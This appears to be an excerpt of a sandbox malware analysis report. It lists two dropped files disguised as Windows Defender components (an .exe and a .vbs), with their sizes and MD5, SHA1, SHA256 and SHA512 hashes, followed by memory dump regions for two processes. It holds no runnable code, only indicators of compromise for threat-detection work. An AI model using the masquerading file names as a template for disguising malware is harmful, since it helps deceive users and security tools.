                083881cae4ebf61d647cd0df39b3fe45a2ecae30054deb8cd729c0014dfe3d4812ef4fa5c0b774e02146c5e5498eb70c27cbaeeddb3768891005dd9f4b259b06

              • C:\Users\Admin\AppData\Roaming\WindowsDefenders.exe

                Filesize

                82KB

                MD5

                77a37c63d75c14652c07c04170010025

                SHA1

                8adc7b5415e116159c79f1402a3998921d0f1cc3

                SHA256

                ad72008774d9c041d2d573c35fc59380a7b8e84fa6710556fe03959d47e98e7a

                SHA512

                f7ec0262f17d2d42a5f4402a33ff0f8d6e11529a5fc0b3ed46a356d135ee216d47a440cd348031747f922e97671ade895284fe5ffb3885b9fcab8fc2cec5e45d

              • C:\Users\Admin\WindowsDefender.vbs

                Filesize

                183KB

                MD5

                2fcc8fa5c81b31834ad3a7914635594a

                SHA1

                92bfba7ba8a210f9d33859ff291ce872ca0c5f3b

                SHA256

                369a604722053e6d9285e38780ce53ade1281b551221f6eec4cf230e896e6cec

                SHA512

                32dd14d8efc189e28979610b7c5ed06c18b61f72d11aaaa269f09f52aa1326c7a0a29db04ad70770b25a2f12313d60f14a4e913ccf0d98164893f489a5b0f983

              • memory/2028-30-0x0000000005760000-0x0000000005AB4000-memory.dmp

                Filesize

                3.3MB

              • memory/2028-32-0x0000000005D90000-0x0000000005DAE000-memory.dmp

                Filesize

                120KB

              • memory/2028-55-0x0000000007340000-0x0000000007348000-memory.dmp

                Filesize

                32KB

              • memory/2028-147-0x0000000075170000-0x0000000075920000-memory.dmp

                Filesize

                7.7MB

              • memory/2028-54-0x0000000007350000-0x000000000736A000-memory.dmp

                Filesize

                104KB

              • memory/2028-53-0x0000000007310000-0x0000000007324000-memory.dmp

                Filesize

                80KB

              • memory/2028-52-0x0000000007300000-0x000000000730E000-memory.dmp

                Filesize

                56KB

              • memory/2028-51-0x00000000072D0000-0x00000000072E1000-memory.dmp

                Filesize

                68KB

              • memory/2028-50-0x0000000007370000-0x0000000007406000-memory.dmp

                Filesize

                600KB

              • memory/2028-49-0x0000000007140000-0x000000000714A000-memory.dmp

                Filesize

                40KB

              • memory/2028-48-0x00000000070D0000-0x00000000070EA000-memory.dmp

                Filesize

                104KB

              • memory/2028-47-0x0000000007720000-0x0000000007D9A000-memory.dmp

                Filesize

                6.5MB

              • memory/2028-46-0x0000000006F90000-0x0000000007033000-memory.dmp

                Filesize

                652KB

              • memory/2028-45-0x0000000006F60000-0x0000000006F7E000-memory.dmp

                Filesize

                120KB

              • memory/2028-34-0x0000000006370000-0x00000000063A2000-memory.dmp

                Filesize

                200KB

              • memory/2028-35-0x000000006FDE0000-0x000000006FE2C000-memory.dmp

                Filesize

                304KB

              • memory/2028-33-0x0000000005DD0000-0x0000000005E1C000-memory.dmp

                Filesize

                304KB

              • memory/2028-56-0x0000000007430000-0x0000000007452000-memory.dmp

                Filesize

                136KB

              • memory/2028-31-0x0000000075170000-0x0000000075920000-memory.dmp

                Filesize

                7.7MB

              • memory/2028-13-0x00000000047E0000-0x0000000004816000-memory.dmp

                Filesize

                216KB

              • memory/2028-14-0x0000000075170000-0x0000000075920000-memory.dmp

                Filesize

                7.7MB

              • memory/2028-24-0x0000000075170000-0x0000000075920000-memory.dmp

                Filesize

                7.7MB

              • memory/2028-16-0x0000000004DC0000-0x0000000004DE2000-memory.dmp

                Filesize

                136KB

              • memory/2028-18-0x0000000005670000-0x00000000056D6000-memory.dmp

                Filesize

                408KB

              • memory/2028-17-0x0000000005590000-0x00000000055F6000-memory.dmp

                Filesize

                408KB

              • memory/2028-15-0x0000000004EF0000-0x0000000005518000-memory.dmp

                Filesize

                6.2MB

              • memory/3492-29-0x0000000075170000-0x0000000075920000-memory.dmp

                Filesize

                7.7MB

              • memory/3492-0-0x000000007517E000-0x000000007517F000-memory.dmp

                Filesize

                4KB

              • memory/3492-8-0x0000000075170000-0x0000000075920000-memory.dmp

                Filesize

                7.7MB

              • memory/3492-7-0x000000007517E000-0x000000007517F000-memory.dmp

                Filesize

                4KB

              • memory/3492-6-0x0000000075170000-0x0000000075920000-memory.dmp

                Filesize

                7.7MB

              • memory/3492-5-0x0000000075170000-0x0000000075920000-memory.dmp

                Filesize

                7.7MB

              • memory/3492-4-0x0000000004E50000-0x0000000004E5A000-memory.dmp

                Filesize

                40KB

              • memory/3492-3-0x0000000004E60000-0x0000000004EF2000-memory.dmp

                Filesize

                584KB

              • memory/3492-2-0x0000000005500000-0x0000000005AA4000-memory.dmp

                Filesize

                5.6MB

              • memory/3492-1-0x00000000003D0000-0x0000000000456000-memory.dmp

                Filesize

                536KB